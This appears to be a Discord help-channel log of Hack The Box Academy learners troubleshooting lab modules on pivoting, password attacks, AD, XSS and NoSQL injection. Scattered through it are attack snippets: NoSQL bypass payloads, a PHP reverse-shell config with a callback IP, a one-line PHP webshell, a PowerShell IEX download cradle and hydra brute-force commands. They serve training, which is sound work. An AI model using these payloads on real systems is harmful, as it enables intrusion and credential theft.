#modules
no, but i did a box that required it
ok
will try it thanks 🙂
So there was a box i did that required NoSQLi.
I used this tool, more specifically the bypass tool
it tells you if it's NoSQL injectable, and provides an example injection code
{"username": {"$ne": "dummyusername123"}, "password": {"$ne": "dummypassword123"}}
This is an example of the "injection" the tool provided me.
Hope it works for you!
nope doesnt work :/ false positives
the section has to be updated...
its a new module too lul
3 months old :/
i guess i can't continue unless it will be updated. i tried every possible payload by hand lmao
honestly kinda surprised sqlmap doesnt have better support for nosql yet
its certainly becoming more popular
wdym by false positives btw
it says the param its injectable but its actually not
did it give an example of what you could put in there
xd
seclist has a list of possible nosql injections i believe
used that as well
You might need to switch to passive mode sometimes cause the server has been configured to prevent directory listing
Thanks!
anytime sir
It doesnt always work tho.
did you try it as get parameter, post parameters, or as json data
the tool i gave him would specify if it's a json injection or not
in the case of the box i did, it was
hence i asked for output
theres a lot of nosql injections where the app defaults to post parameters and you have to manually turn it into a json request for it to get processed properly
really? ill try it out
dont forget to change the content type header too!
I stumbled upon that switch on a box I did recently. Not all nosql injections require it.
didn't do it 😦
bummer
can i see what the tool outputted for you?
the nosqlbypass thing?
yeah
username%5B%24ne%5D=dummyusername123&password%5B%24ne%5D=dummypassword123
Can you just try putting that there
did you copy paste that whole payload, cause thats diff than what you posted you tried earlier
yeah
Thats why i asked for output
username[$ne]=dummyusername123&password[$ne]=dummypassword123
?
the same
yeah xd
seems kinda unusual imo
oh haha I see why it wouldnt work
why? 🙂
the param[$ne] technique is a nodejs specific method
ik
the server there is werkzeug python based
damn
so any variant of that was never gunna work
i see
I have read a few problems with the ICMP Tunneling with SOCKS module.
Has anyone had issues at this point, it seems like others were at least able to run autogen
╰─ sudo ./autogen.sh ─╯
++ pwd
+ OLD_WD=/home/p3ta/HTB/Academy/pivot/ptunnel-ng
++ dirname ./autogen.sh
+ NEW_WD=.
+ cd .
+ autoreconf -fi
./autogen.sh: line 10: autoreconf: command not found
+ aclocal
./autogen.sh: line 11: aclocal: command not found
+ autoheader
./autogen.sh: line 12: autoheader: command not found
+ automake --force-missing --add-missing
./autogen.sh: line 13: automake: command not found
+ autoconf
./autogen.sh: line 14: autoconf: command not found
+ cd /home/p3ta/HTB/Academy/pivot/ptunnel-ng
+ ./configure
./autogen.sh: line 19: ./configure: No such file or directory
unless it was like a crazy second order nosql injection
looks like you need to install automake
let me try that thanks
so Im not personally aware of any python specific nosql shenanigans so presumably if the task really is auth bypass, you should be looking at more standard straightforward nosql auth bypass such as || shenanigans
oh yup just as your image indicates
hmmmmmmmmm
try something like ' || 1==1//
maybe quotes around the 1s, experiment with no quote, double quotes, ect
tried every combination
"Log in failed with given credentials"
also tried at /forgot and /reset
this seems to be a common thing, I am going to dig around a bit for other versions of it, but any suggestions.
ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r10.129.202.64 -R22
[sudo] password for ubuntu:
./ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory
looks like you need to install libcrypto
this is on the pivot box, so HTB's machine not mine
Finally solved the medium lab, thanks for everyone!
You got through this already? I got the same issue trying with MSF and with msfvenom or am i on the wrong path?
on the Vim tutorial in linux, why do none of the commands work how they suggest it to? when I go into Vim, none of the commands suggested work, and when I do 'vimtutor' it just says command not found. What am I doing wrong here?
nvm im dumb
I'm new I need a friend
Hey All
so I tried the reverse shell for HTB: Included
still no luck
cat shell.php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.98'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
This is my php reverse shell
The IP is tun0
I am using HTB Platform
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.98 netmask 255.255.254.0 destination 10.10.14.98
inet6 dead:beef:2::1060 prefixlen 64 scopeid 0x0<global>
inet6 fe80::44a6:9a7:740:5119 prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 97 bytes 67443 (65.8 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 114 bytes 15830 (15.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
@fathom pendant
@ocean night
any advice brother
@mild mango
my g is pinging the whole squad
Script with curl and filter looking for what you need. If you need help DM
@shadow nest please do not randomly ping people that appear online
Ok
i thought those were his friends 😭 i cant-
hey im doing the linux fund and im at this question that ask about the path to htb-student mail.. i found it in /var/mail but it says im wrong
would anyone be able to assist me in a mounting issue? i dont have a command showmount and when i attempt to mount the shares i found to a directory i created it gives me "bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program."
im using parrot
@supple jackal make sure its full path
sorry but i thought that was the full path
/var/mail/htb-student
would that be the full path
try it 🙂
i did it still says im wrong
The box was too slow for me to even get a shell on the foothold. I think it was just my internet at the time though. I just tried connecting again and everything is way faster
mmmm maybe its derping out? refresh it all?
uhh I see lol.
i thought maybe i was wrong
im not entirely sure what i can and cant say to help. but what you have i have and is good for me.
nvm mind on mine. i installed nfs-common and tried it again. worked fine
I genuinely ignore pings if i'm not expecting them
anyone that can give me a little help on the lab: Password Attacks Lab - Easy
you have tried to hard close browser and reopen and not just refresh?
turned my whole computer off and went to work for 9hrs
lmao
yeah this one there's no htb-student mail folder
so it's tricky
as in - need to do a bit of research on what /var/mail is
so put it just like /var/mail
im dying of boredom waiting for the bruteforce to go through and getting no results
if what you have in the screenshot doesn't work, try adding another / at the end
nope still nada
this is linux fun in system information section yeah?
yes
if so mine shows you are correct as ive done this
maybe talk to staff member? im not sure tbh
i dont think i can directly give you answers tbh.
which section is it ?
so did msf or a payload with msfvenom work for u then?
yeah it worked for me
GNU is just the GUI (kinda sorta)
just try not to bash your head against the wall
also be careful of rogue spaces they mess ya up real bad when inputting things
i have a question is there anyone who can give me a hand
yeah generally it shouldn't take 5 days to crack something, maybe a day and a half depending on your password list and the specs of your computer. Id really really try to get hashcat to work on your windows machine if you want to make full use of your gpu as most virtualization software will not support gpu passthrough
not sure why you're having that issue to begin with but honestly i'd just abandon ship where trying to use hashcat in a vm is concerned
/bin/bash 🙂
If you say what you want to know, I'm sure you'll find someone who can answer the question.
Active Subdomain Enumeration
When looking for additional dns zones, is there another way to spot them rather than trying to axfr to them one by one? there were 19 A records there where one of them was a zone
This depends a bit on your distribution
Mhm if you're starting from the top
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
I have noticed that the ping sweep in the pivot module for windows machines does not really work. at least for me. So I wanted to share what I ran. ||1..254 | % {"x.x.x.$($_): $(Test-Connection -count 1 -comp x.x.x.$($_) -quiet)"}||
Pivoting, Tunneling, and Port Forwarding - Skills Assessment: Submit the contents of C:\Flag.txt located on the Domain Controller.
Was this flag really that easy where it is ||mounted to the Z: when you log in or was that not supposed to be like that. ||
curses
YOOOO. happy friday foos
i just figured how to get the exploit working on the shells and payloads skills assessment and then xfreerdp just closes
you as well... 48.57% done lol... I was hoping to break 50% today 🙂
Don't know if you got a hint yet but use hydra and the password.list and username.list file that they provide in resources. Use -t 64 in your hydra command. The "t" flag will increase the threading so it's completed in less time. You can also throw on the Verbose flag -V if you want to watch it run. After that let it run for a hot minute (a long time). You should be able to figure it out from there. Sometimes people forget that the lowercase "p" and lower case "l" in the hydra command are used for specific passwords and usernames. So, make sure they are uppercase otherwise it will read your lists as a literal word rather than reading the list itself. Last hint, make sure its a refreshed box because it takes awhile. Hope that helps.
this worked for me
$ dig axfr -f subdomains.txt @<ip>
whats up HTB Crew
I have a technical question regarding connecting to teh target machine that a module spawns, can anyone help with that?
maybe. whats up
I figured it out I have to many instances of openvpn running killed them all muahaha. Thanks for checking in.
lol yea that can do it
May I get some help for AD Enumeration & Attacks - Skills Assessment Part II
Submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host
I have a password and not the hash of the user from the previous question. As port is not open for evil-winrm, rdp or ssh how do I connect with the credentials?
did they go over any other tools in the module that use a pass the hash attack beside evil-winrm?
sorry
misread
are there any other ports open that would allow a connection with the password?
Need some help on module Active directory enumeration and attacks
section- Attacking Domain Trusts - Child -> Parent Trusts - from Linux
Last question - Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.
been trying to use secretsdump.py but think might be getting the syntax wrong if anyone already done this exercise
Anyone on that can assist with the Cross-Site Scripting module? Stuck on the Session Hijacking question.
hi everyone
what do you need help with / what have you tried?
hi bro
i have a question for the foot printing DNS section. im using dnsenum to find the FQDN for the x.x.x.203 ip but my lists arent picking it up. any idea which list i should be using? or am i going in the wrong direction
445
do you have a username to go with that password?
So you're doing footprinting section dns question 1?
last question
Yeah. Was thinking psexec to get a shell but couldn’t remember what port that connection is.
Not in front of the computer at the moment.
445 is SMB. its possible you can upload a reverse shell. not sure how youd be able to start it though
dang didnt take notes on the exercises of this module only did the skill assess but trying to look through dns wordlist see if I can remember which one was used
can somone help me out real fast
that would be helpful. i think ive gone through all the seclists
searched through discord again used the fierce wordlist
Use the fierce wordlist
on .dev.
you used it on the dev server?
on kali default location /usr/lib/python3/dist-packages/fierce/lists/
is it not on parrot at all?
can someone please help me do sum
this is like one of the only channels i can type in, sadly
i have the fierce-hostlist
not sure but you can use command <locate fierce> to search for it
true. ill look. thanks
got it. thanks. i think part of it was how i was enumerating too
sweet glad you got it
How unethical would it be to hack and use a rigged for profit gambling site that operates illegally and take your money plus back? Hundreds of thousands....do this question violates the rules of hack the box?
more so its not the right channel
also not relevant to this channel
yo, I have a question
suppose i can run a specific ruby script as sudo, is there a way to piggyback off of it and execute an additional command? Smth like "sudo ruby script.rb + exec /bin/bash"
pls dm me my friend's id has been hacked
Say that shit again and you will get the boot. This is a warning.
If he has been hacked, he needs to talk to discord themselves
sql injections are so satisfying
How is my name offensive tg
help you with what?
Look at the script, what it does, whether it parses ARGV or ENV, or passes inputs into other commands, look for system or open method calls. sudo will prevent you from passing in certain env variables like RUBYOPT which can be used to tell ruby to load additional files. If you can view /etc/sudoers or /etc/sudoers.d/, that might show you if certain env variables are allowed to be passed through sudo.
read the rules
Hi everybody, I'm doing the Hacking Passwords with Hashcat module and i'm stuck in the 'Dictionary Attack' section. I think that I guessed correctly the type of hash they're asking for (MD5 I think), but when I run the command to crack the hash I can't get the correct answer... If someone can help me out i'll appreciate it
#rules they need to be able to easily tag you
Hey guys, I'm pushing this week-old question again as I still yet have to find an answer for it:
On the OSINT: Corporate Recon module, Location section
"What are the city's coordinates where one of the company's offices, "inlanefreight.com" has its headquarters in Germany? (format: 00.0000 N, 0.0000 E) "
I have found the answer (as in the city name) as I have found the UK and US cities and they managed to validate. Sadly the German city does not and I cannot for the life of me get the coords right. The coords I get from Google are just a tiny bit off from partial coords I got off a walkthrough I found online.
Did anyone manage to beat that section and has the exact GPS point that is required by the question?
Thanks!
question: assuming i've got an operational simple webshell (e.g. <?php system($_REQUEST[0]); ?> ) can I use the command wget from that webshell to grab a much better webshell assuming i can wget it into the webroot dir? i.e. put get simple php webshell then use that to download the whitewinterwolf webshell.php? I can't seem to get it to work
Have you tried shodan or whois?
yea that's really not the issue. I have the answer. Thing is the question just doesn't want to take it
For the modules, the machines we are attacking do not have internet access
yes sorry I should have made clear I was asking a general question Marcie, not module specific
demonstration:
||city is: Oberhausen. Google gives me these coords for this city: Latitude: 51.4731 Longitude: 6.8807. // The answer is asking for these: 5*.***3 N, 6.***8 E||
Theoretically possible: but that begs the question - how would you execute that shell.
if i wget it into the webroot i should be able to just browse to it?
its offtopic for this channel so you're better off asking in #1024429874246590575 or seeing if someone asked the same or similar ¯\_(ツ)_/¯
Are you putting it in the format requested? Looks like the format is asking for 4 decimal places
yea I have, but you'll notice my partial answer is just a bit off from my google result
I guess they moved the city center since they made the module :/
Post it in #858470491676737536
Since the correct answer is not the answer they want
Help with Broken Authentication Skills Assessment module please. Here are the things I have done:
- I have found 9 users
- I have figured out how cookies are being created
- I have created a wordlist based on the password policy using rockyou.txt
- I have used the ratelimiting script to bruteforce the 9 user's passwords using the password list I created from the password policy (couldn't find any passwords)
Is there something I am missing? Please reply or DM me if you can help 🙂
google🤓
but you can use safari🤓🤓
thanks for the help, I didn't think of that
Is this related to an academy module?
I have solved the 'question' for DNS-AXFR.py in the DNS enumeration with Python module, but I am trying to understand why I am unable to get the script to work locally and not having to use the pwnbox? I am getting this error locally: nameserver ns1.inlanefreight.com is not an IP address or valid https URL but if I supplied the target machine ip address & nameserver ip addresses (yes I added this all to my hosts file) I get this error: Zone transfer error: SERVFAIL Zone transfer error: SERVFAIL any ideas?
Just seem to be having trouble getting the server to request the script.js from me. Yesterday morning, I kept trying and getting nothing, then 90 minutes in I got 12 requests within 2 seconds. Haven't gotten anything from it since, multiple respawns, tried every format of the XSS I can think of.
hum? 🤔
Hi,
On the assessment of brute force module in service login section.
This is correct for the wordlist of password with cupp ?
I have 3696 password and i have 1320 after filter with 8 characters, number and special character.
It's correct ?
For the username i use username-anarchy with H----- P----- and i have 15 username.
I'm on this assessment since 3 days ...
each time the brute force is too long and either the server stops or it receives too many connection attempt errors.
Please help me 😅
I've different ones
Hey! Can someone help me with with Attacking Common Applications Assessment I? The last question regarding the flag... I was able to use the /cgi to view the directory and get to the flag... However, no command is allowing me to view the contents of the flag.
who is in the live engagement module ?
Figured it out. Not sure why, but the rate_limit.py script was not working correctly, I'm guessing it's because I didn't include the Content-Type header. I ended up using intruder with a rate limit and that worked. If anyone is stuck on this in the future, feel free to message me 🙂
I don't remember that module clearly, but you could try including the surname in CUPP and see if that gives you better results. 👍
I have read on the forum and many users say that is not necessary but i am trying with the surname too. For the moment i have no good result.
for shells and payloads?
Nvm, just figured it out. kinda tricky. 
Yup
i just finished that module yesterday so the content is fresh in my mind
what do you need help with?
Hey all, im having trouble with the Password Attacks module. I'm trying to brute force rdp, however I keep erroring out with hydra. Keeps saying All children were disabled due too many connection errors. And the times that it does give me an account, they don't work on rdp. Anyone have this issue? Just want to know if its normal, or if im having a connection issue. I have restarted multiple times, including my own pc -- feel free to respond here or dm me. Thank you!
the problem came from my script to sort the word list, I had 1320 words with my python script and using sed in command line I have 1451 !
All is good, 3 days for this error ...
Friends please help me.
Hi, it's me again, can someone help me with the module of Web Services and API attacks: skills assessment.
I'm a bit stuck
Hi, Can anyone help me with the module Cross-Site Script (XSS) ? I am stuck at submitting an answer, seems like xsstrike tool is not completing the scan and stuck.
Which question is it?
Utilize some of the techniques mentioned in this section to identify the vulnerable input parameter found in the above server. What is the name of the vulnerable parameter?
in "XSS Discovery"
which of the two questions in this module
-
Utilize some of the techniques mentioned in this section to identify the vulnerable input parameter found in the above server. What is the name of the vulnerable parameter?
-
What type of XSS was found on the above server? "name only"
https://discordapp.com/channels/473760315293696010/1068939596051787776/1068939596051787776
You can see here, the problem I am facing.
What do you get?
you can also use that https://www.countrycoordinate.com/
Type an address or place name and get its GPS coordinates like latitude, longitude, maps, geohash, DMS, UTM elevation and so on.
Also, can you please elaborate how you did it?
complete the form and then in each variable place one by one this payload <script>alert('XSS')</script>.
I sent you a DM
can someone give me a lead on with password attacks medium lab. successfully logged in as d user. found the ssh directory and bash_history file but i can't figure out what to do with them.
nvm got root access by doing something i thought i tried already like 50 times
Something went wrong while sending the verification email. Please contact our support team for more information. can i get some help here
and how do i get tag #1024429874246590575
so i can post in there
Support can be accessed via the green bubble on the bottom right of the page; if you don't see it you'll need to disable adblock
Hello 👋..anyone done with using crackmapexec skill assessment need some assistance,got the users..just stuck on getting cme errors in the next step
Hello, in Active Directory Enumeration & Attacks kerberoasting from linux
the question : What powerful local group on the Domain Controller is the SAPService user a member of?
I got this through manual searching Through Getting local groups via crackmapexec and I looked through them .. i'm looking for an automated query or something that I might use in the future.
Im in the assessment for web attacks, i managed to change the passwords for each user, but i have no clue whats next, do i have to change json to xml or something? Or what route should i go
May I get some help for AD Enumeration & Attacks - Skills Assessment Part II
Submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host
I have a password and not the hash of the user from the previous question. As port is not open for evil-winrm, rdp or ssh how do I connect with the credentials? SMB port open but unable to login to smb with credentials.
DC01 may not be open; to outsiders
Possibly may need to access it somehow as administrator from MS01 box?
just throwing an Idea out there ¯\_(ツ)_/¯
haven't done it myself
but I heard AD is the mid-boss of cpts
Understood. Thank you
could you use something other than rdp?
oh, I see, you literally said As port is not open for evil-winrm, rdp or ssh. that's strange.
again not open publicly is a possibility
hello i dont understand much about discord
shortly i am ready to pay unlimited money for very important job for me that might be easy to you
please dm me for info
No.
if you got the cred for the user on question 9 i'm not sure if you can login because i didn't (just because out of habit) and i don't have any note on can't logging in with this user also there is ||winrm||
if you check the ||uid|| for all users none of the usernames will have ||admin|| in it but hint the last bit of info at the end will reveal that
Okay. Not sure what you mean regarding the winrm comment. That port is not open for DC01
if you dump the TGS ticket for the user on question 1 then you should see a list of groups that this user is a member of under "MemberOf" and for the "powerful" part i guess you can really only guess based on the group name
my nmap scan shows it is, maybe try scanning just that port and with a deep scan tag like the -A tag or the best thing you should do for all windows target labs is always give it a few min for it to fully boot up
{
"uid": "74",
"username": "htb-student",
"full_name": "Paolo Perrone",
"company": "Schaefer Inc"
}
you mean i should look for a hint in usernames?
close but nope i mean you should look for a hint in the stuff beside the username (there is only 2 other)
Oh you are right. It did show up open now. Weird. Still can’t login to it like u said with the credz..will try to perform different nmap scans to see if I can find something else I can connect to.
hint you don't need to "login" via something for the last part, you can just use the previous user for that and also the last hint is do some enum about the user you just got
Copy that. Thank you @vital adder
Has anyone done Introduction to Windows Command Line?
yep what's the issue?
||Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file. || I've been trying the ||where /R C:\Users\htb-student\ waldo.txt|| command but still cant find it
which section?
Finding Files and Directories
hint your command is right but i don't think the file is in htb-student user home directory
try running that command for ||C:\users|| instead
Alright
Still nothing
I tried to cd to others users before
but access denied
There was a public dir doe
the command in my note start with cmd.exe /c for some reason i think i was in powershell when i was writing my note
also i don't got the file location in my note and i think you can run cmd as administrator so if you got access denied try that
I don't have access to the other users dir
That the problem :S
It should be in htb-student
cause the question told me to RDP to the server
and search for waldo.txt
yep i just give it a try and run cmd as administrator with the where command worked for me
Any replacements for Attacking AuthN Mechanisms? 500 cubes is unattainable for me lol
i haven't done that module but for web stuff you should be able to learn it for free from portswigger and if you want to learn the stuff that's similar to the module check the section name and find a material here that is similar https://portswigger.net/web-security/all-materials
Is there someone that could help me in the ffuf module? i'm stuck in filtering result. I'm trying to make the VHOST requests but there is something wrong. if there is someone, please write me in priv :).
your first example is pretty close to the right command so you may want to remove that because of spoiler and hint revisit the ||Bypassing Blacklisted Commands|| section for the last thing you need for your command
which section are you on?
I have been stuck on the same section for a while now, I genuinely think there is something wrong with my lab.
Attacking SQL databases under attacking common services module
oh wait a sec i did use the same command as your first example in my note and it worked just fine also no idea about that character because i did use it
what's the issue?
I have tried using sqsh, mysql, impacket and none of them are working for me
to login?
I have no privilege to do anything on any of them, the only one I can login into it sqsh
it wont let me use databases... or switch and the syntax does not make sense
yeah so impacket isn't a tool it's a set of tools (i think) and this target is running mssql (microsoft sql server) not mysql so you can't use mysql to login
Makes sense but yes I tried using mssqlclient.py, just have no privilege to do anything
im logged into sqsh now
which is sqlcmd for linux
i can't remember exactly but i think yep for the question and the given user you can't access any databases
exactly... i have no idea what to do....
hint the question is asking for a password so re-check the section for method that can extract password
hmmm okay...
filtering result
so for brute forcing vhost in ffuf you'll need to add -H 'Host: FUZZ.academy.htb'
oh wait this is the first section that you have to do this so did you add the ip and domain into your hosts file without the port?
and for the url did you use http://academy.htb:(port number)/ ?
Obv
oh that's kinda weird shoot me a dm with your command
Oh... I just used the technique and got a hash I think? with responder
can I message you?
how long are the password attacks exercises going to take?
it depends but some took quite some time
i'm going to need more than music to get through these then
as the pw attacks are generally brute force - takes a minute
I'm going through Login Brute Forcing - Skills Assessment - Service Login (it's the last part of the Login Brute Forcing module), and I'm having an issue. Question 1 tells me to "use 'usernameGenerator' to generate potential usernames for the employee." That isn't the tool that was shown to us earlier in the module; the one we actually got some practice with was username-anarchy. I can't locate anything named 'usernameGenerator' on the web or on the vm.
So I go with the username-anarchy tool instead, since that's what we've been shown. None of my attempts to crack the login are working though. They just churn forever until I run out of time on either the VM or the IP I'm supposed to be targeting. I'm sure I have the correct employee name, so the only thing I can think of that might be causing me issues is that the wordlists I've made for the username and password are somehow flawed.
Can anyone help me with this?
I've built a password wordlist with cupp, and trimmed it down to meet the password criteria that are outlined on the login landing page.
sorry for the delay and sure
figured out the solution haha nvm
so for the username list i just use username-anarchy and for the password list if you got the right name you can just put it in cupp a few time, i only put it in ||twice||
That ended up working 🤦
Thank you, I appreciate the tip.
Once you're on the box via winrm you can|| query the membership of a certain group to see who can connect via RDP||. With that username and the provided password list you'll find that enumerating via CME or Hydra will work 👍🏼
actually does the ssh config for password attacks limit the number of parallel tasks
has anyone run into the issue in the crackmapexec module where --get-file and --put-file don't work? The same commands run in the pwnbox work, but locally on my parrot install, it just gives the normal cme smb $IP output, with no errors or anything
cme smb $IP -u grace -p Inlanefreight01! --share Share --get-file /path/file.ps1 /path/file.ps1 --verbose
usage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--darrell] [--verbose] {ldap,mssql,smb,ssh,winrm} ...
crackmapexec: error: unrecognized arguments: --verbose
tried with -v as well, says unrecognized arguments: -v
F
cme is VERY picky about the order of its arguments
--verbose iirc has to be before your smb option
gotcha
9/10 times if cme doesnt work how you expect, youve got the arguments ordered wrong
Sounds frustrating
that's really neat, I learned quite a few things about cme so far today
it's a little frustrating, but w/e
DEBUG Error creating SMBv1 connection to 10.129.28.239: Error occurs while reading from remote(104)
is there any way to force smb2
the --verbose placement is a protip for sure. I won't forget that.
this password mutations exercise is taking way too long.
i've cut it down to 86k lines, attacking FTP now..
and it's doing it at 140 tries/min instead of 2000
I'd installed via pipx and going through the pwnbox vm there is a shellscript in /usr/local/bin that runs /root/.local/bin/poetry, so way to know that right off the bat
I know this is old but I figured out the problem here. Your CDATA payload is looking for flag.txt. (I did the same thing...)
Holy shit that was a million years ago lol
10/01/2022
YUP! Looking at your screenshot helped me figure out what I was doing wrong though lol
Lol
im doing my first ever --level=5 --risk=3 attack in sqlmap .... just roughly how long will these take? Just so I can plan my lunch break 😛
Sweeet!!!!
Not too long in my experience
ok like 20 mins or something?
ok thanks, appreciate it
No prob homie
Anyone done documentation reporting test?
im trying to do this module to understand ssh logins but I cant connect to a port without my connection timing out, and the prompt to enter my password doesnt appear. pinging the ports also isnt working
which module what section
also you can specify ports with ssh which might fix your problem?
Linux Fundamentals very first optional question
*in Sys Info
I feel like I'm having a stroke with trying to find the flag for nmap's service enumeration. I'm not seeing a certain flag. ||I have not tried a UDP scan yet, I'll be trying that now||
I'm not sure if this help but this is how I ssh'd in
sometimes restarting the flag
works
restarting the target*
Hey people!
or resetting your vpn connection
cause i've had it work in pwnbox and not my system
so dc/reconnect to vpn solved
Welcome to hackthebox. Have you read #rules ?
hey Yaoi how's your journey m8?
yeah its my 10th new target xc
oof
hbu?
yeah im gonna try that ive had it on for a few hours now and my internet d/c earlier but I didnt reset the vpn
I've also restarted the target a few times.
but yeah in my experience the version scan should give you the thing or that may be one that you need to nc into if it's that part that i'm thinking of @short horizon
tyty but mine didnt give the option for fingerprint to appear
Welcome! Yep all done, I am new here and I will try to provide as much help as possible!
Sweet! good luck on your hacking journey homie !
😎
💥💥💥
Yep, that was it. I was starting to lose my mind thinking it was a service in the nmap scan xD
destination host unreachable xc
Are you using pwnbox or the vpn?
IT should be a relatively simple fix
I've ssh'd into things a million times
im using open vpn
always works
yeah
cause Oracle itself is a huge company that does many things
one of those happens to be a virtual machine hosting software
Java 💢
Can it connect to the internet?
sudo openvpn /path/to/vpn.ovpn
Like can you visit websites and shit?
that too
openvpn is running on your host system; while I don't think that's generally going to be an issue
i've heard it causes issues if you're not running it directly in the vm
👆
ah maybe thats it, it must be something small im too sleep deprived to think about
Try that and see if it works
There is also support that can help if you still can't get it figured out
@worn anvil Here is the command to do it. I think openvpn should be installed on parrot by default
Parrot OS comes with OpenVPN installed by default.
also /path/to is a substitute
if you're running the command where you have the ovpn file; you don't need to specify the path
man, i just started this file transfers...the windows section is kind of overwhelming with long commands you have to run
hint: you don't have to run them all
Definitely one of the easier modules in my opinion ngl
lol
there's honestly not much that you HAVE to do in that module
most of it is just "hey practice using these types of commands and figure out which one works best for you"
ok...i saw IEX (New-Object Net.WebClient).DownloadString('https and was like wth
don't worry, the module breaks down the commands in depth so you know what the command does
okay but tbf the IEX webclient one is a really good one to know though
^
And the Invoke-webrequest one
yea im trying to get through it...i have read it like 4 times haha
its the lack of sleep my mind is on fire
its probably because going from Linux all the time, then going right into this...its like woah
also tyty to all of you
glad to help : D
just because a shell is a shell is a shell
i'm running out of mutated passwords to check on Password Attacks - Password Mutations
i got the custom rule and the passwords.list
ran it through hashcat and did a sort -u
seen too many people get tripped up that
i don't think that was necessary unless you were told to do so
cause iirc most people cut the first 17k lines :)
and made the process 10x faster
yeah i tried that and it made me question my methods
you know what i'll try it one more time
cut 17k lines with sed -e '1,17000d' < mut_password.list > mut_password_cut.list
||hydra -l sam -P mut_password_cut.list -t 64 ftp://<ip>||
In Module SQLMap, Section Attack Tuning, Question 2 (case #6), the hint suggests using a prefix, which is fine I can do that. Aside from reading the hint, is there any way I could have known to use that particular prefix?
probably something about the question itself would have helped :p
but that's just a theory
i have to be making a mistake somewhere but where the hell is it!?
i'm waiting 15 minutes for hydra going at 2300 tries/min
lmao its still not working
anyone have an idea where i can use an ipmi hash?
@dim cosmos dm'd you i'll help with sql
you crack the hash
password likely to be for a valid user elsewhere on the system.
might be able to interact with the ipmi service itself but idk too much about that
hey ya i couldn't find anything googling about how to use an ipmi hash. this documenting and reporting module sucks. theres like a 3 second delay even moving the mouse. idk y they don't make it fast, its virtually impossible to use it. tried changing vpn's and all that
the ipmi hash is covered in one of the way early modules
footprinting
Footprinting
yup
for sure i'll check it out thanks
also the "hash" it gives you; don't use that unless you're assuming it's using default creds; use a wordlist in place of the ?1?1?1?1 talked about in that module
you will only need to crack using the wildcards it if it is an HP iLO IPMI hash
i cut the first 17000 lines and i'm not getting a hit
no.
kk
just ask bro
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
what does "Error! reCaptcha Validation failed" mean when u try to register for the hackthebox acct for the 1st time
really.. surviving the dark web torture session wasn't as ez as it seem
there was no pop up to see if I am human or bot
so I am unable to register
guess it's a skill issue man; maybe your adblocker is blocking it or something?
lemme try this on tor
lol unless htb is blocked by your isp/country no real need or reason to access it via tor
wait wth is this
???
nothing bad is gonna happen by accessing htb
I am trying to access the module nothing more
lol
btw if you're trying to sign up for an academy thing you need to be signing up on https://academy.hackthebox.com/
not https://www.hackthebox.com :)
Im confused on why this doesn't work: I'm doing the WP Skills Assessment and I'm stuck at this question:
Identify the only non-admin WordPress user. (Format: <first-name> <last-name>)
I tried using:
curl GET http://blog.inlanefreight.local/?author=2
which gave me the name ||erika||
But that's it. I can't find an API to make a JSON call to. Im pretty sure this should work though.
Solved it
me too! I can finally find out how the dark web hacked my hardware
Sweeet. What was your issue?
lol good luck with that
Ngl this makes no sense lol
^
probably visited a malicious site without any protection
bruh
Damn. I want to join the mod team so I can be a powermod who bosses people around. No fun at all. Literally change the topic for 2 seconds and mods threaten to mute
anyway shells and payloads is boring
inb4 i bang my head against the wall for 5 hours
even though the vpn was downloaded on the system it wasnt activated, it had to be reupdated and connected to HTB in the vm also
Attacking common services is boring
I just haven't gotten to anything i didn't know yet; also the module talks about importing an exploit... that is now in the exploitdb for msfconsole LMAO didn't even have to do that part
that's more what I mean by boring :) like it's definitely good info to have if you weren't already aware of these things it references
lmao nvm its not letting me type the pw now
You shouldn't see the password being typed
Does that help?
kinda I dont think its typing anything
when I hit enter the connection closes
It shouldn't do that. Connecting to ssh is usually pretty simple so you might be overthinking something
You sure you aren't getting the connection closed because you are typing the password incorrectly maybe?
thats gotta be what it is
lmao ill try copypasting next time I get in, I forgot it's still there even if its invisible
This is gonna be helpful for the future, but learning how to do some research will be very beneficial as you learn.
And also, not overthinking little things
GJ getting it figured out tho
yeah I watched some videos on it they just dont go over my specific problem and I feel like im wasting time when ive been on it all day, it wouldnt be so bad if I didnt work full time
Doing the modules and work is hard. A lot of time is sunk doing them
*I realize that doesnt mean I should only look at issues that can be walked through
good thing im insane lmao
just did sqlmap --os-shell question, LOL what a command
.-. i'm DUMBY i didn't realize that in burpsuite it was literally TELLING ME WHERE TO GO for this module
i...that's what I get for thinking it was just gonna be the same
but idk where the Americas Servers are hosted
the latency is generally not going to be an issue tbh
unless you genuinely have terrible internet
hmm ok thanks
Where can I ask a question about the Nmap IDS/IPS evasion module? Is that here? I'm terribly stuck on the medium module and don't know how to proceed
How do I find the version of services running or the version of the DNS server through nmap? I tried lots of different scans but nothing yields a result (or I did find it but didn't realize that that was the answer)
You probably found it but didn't realize
Damn. What format is a DNS server version in?
Is it like the other 'flags'? HTB{Randommumbojumo}?
You tried running a nmap scan using UDP?
I believe I only did TCP
Out of curiosity; why would I scan using UDP? Edit: I just read online DNS uses UDP (is this true?) so scanning UDP should be the way?
Some services run on different protocols. Voice and video traffic use UDP mainly. DNS runs on both: TCP 53, which was used for zone transfers, and UDP, used for queries, lookups, etc.
Moral of the story, enumeration is key.
